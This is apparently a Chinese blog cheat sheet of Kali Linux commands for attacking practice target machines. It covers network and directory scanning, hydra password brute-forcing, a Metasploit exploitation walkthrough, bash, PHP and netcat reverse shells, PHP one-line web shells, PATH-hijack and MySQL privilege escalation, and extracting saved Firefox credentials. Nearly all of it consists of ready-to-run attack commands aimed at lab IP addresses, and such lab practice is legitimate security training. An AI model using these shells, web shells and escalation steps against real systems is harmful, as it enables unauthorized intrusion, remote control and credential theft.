Kali中常用打靶工具及命令(随时补充)

一、信息收集

1. 查看同网段所有主机

arp-scan -l

2. nmap扫描

nmap -A -T4 -p- 192.168.15.134

3. 目录扫描

dirsearch -u http://192.168.15.134/
ffuf -u http://192.168.15.134/FUZZ -w /home/kali/fuzz.txt(字典) -c -ic -e  .asp,.php,.html,.txt 

4. 站点扫描

wpscan -u http://deathnote.vuln/wordpress -e u
wpscan --api-token=获取到的免费api-token --url=http://192.168.15.135/blog -e p --plugins-detection aggressive
joomscan -u http://192.168.15.134/joomla

二、爆破

1. hydra

hydra -L user.txt(用户名字典) -P notes.txt(密码字典) ssh://192.168.15.130

三、漏洞利用

1. msf工具

msfconsole                       #启动msf
search file manager wordpress    #查找漏洞相关exp
use 1                            #使用第1个exp
show options                     #查看需要设置的参数
set RHOSTS 192.168.15.135        #设置靶机IP
set TARGETURI /blog              #设置路径
set LHOST 192.168.15.131         #设置攻击IP
run                              #启动攻击
/bin/bash -i                     #升级shell

2. gopherus工具

Gopherus工具是用来专门生成gopher协议的payload工具,通过gopher协议的以及各种被攻击应用的tcp包特点来构造payload

目前支持生成payload应用有:

  • MySQL (Port:3306)
  • FastCGI (Port:9000)
  • Memcached (Port:11211)
  • Redis (Port:6379)
  • Zabbix (Port:10050)
  • SMTP (Port:25)
#安装gopherus工具
git clone https://github.com/tarunkant/Gopherus.git
#进入gopherus工具目录
cd Gopherus
#使用
./gopherus.py --exploit mysql

3. searchsploit查找插件漏洞

searchsploit 插件

payload路径

/usr/share/exploitdb/exploits/

四、反弹shell

1. 反弹shell

bash -i >&/dev/tcp/192.168.15.131/6666 0>1&

2. php反弹shell

<?php $sock=fsockopen("192.168.15.131",7777);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
<?php system($_GET['shell']); ?>

3. nc反弹shell

nc -e /bin/bash 192.168.15.137 7777

4. nc开启监听

nc -lnvp 7777(端口号)

5. 升级shell交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

五、Webshell管理工具

1. 一句话木马

<?php eval($_REQUEST[password]); ?>

2. 蚁剑

#下载蚁剑
https://github.com/AntSwordProject
#解压蚁剑加载器压缩包
unzip AntSword-Loader-v4.0.3-linux-x64
#解压蚁剑源码压缩包
unzip antSword-master
#进入蚁剑加载器目录
cd AntSword-Loader-v4.0.3-linux-x64
#启动加载器
./AntSword 

六、提权

1. 使用PATH变量

find / -perm -4000 -type f 2>/dev/null
strings 可执行文件
cd /tmp
echo "/bin/sh" > 调用命令
chmod 777 调用命令
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck
whoami

2. Mysql提权

sudo -u root mysql -e '\! /bin/bash'

七、文件分析工具

1. strace工具检查文件运行过程

strace ./reset_root(文件名)

八、其他工具

1. MD5生成

echo -n "password" |md5sum
#生成的MD5:5f4dcc3b5aa765d61d8327deb882cf99

2. 生成SSH密钥对

ssh-keygen

3. firefox_decrypt提取工具

#下载firefox_decrypt工具
git clone https://github.com/unode/firefox_decrypt.git
#进入工具目录
cd firefox_decrypt
#使用工具
python3 firefox_decrypt.py /root/.mozilla/firefox

4. 端口转发

ssh -Nf -L 9999:127.0.0.1:8080 aeolus@192.168.15.138

5. smbclient工具

smbclient -L 192.168.15.138
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值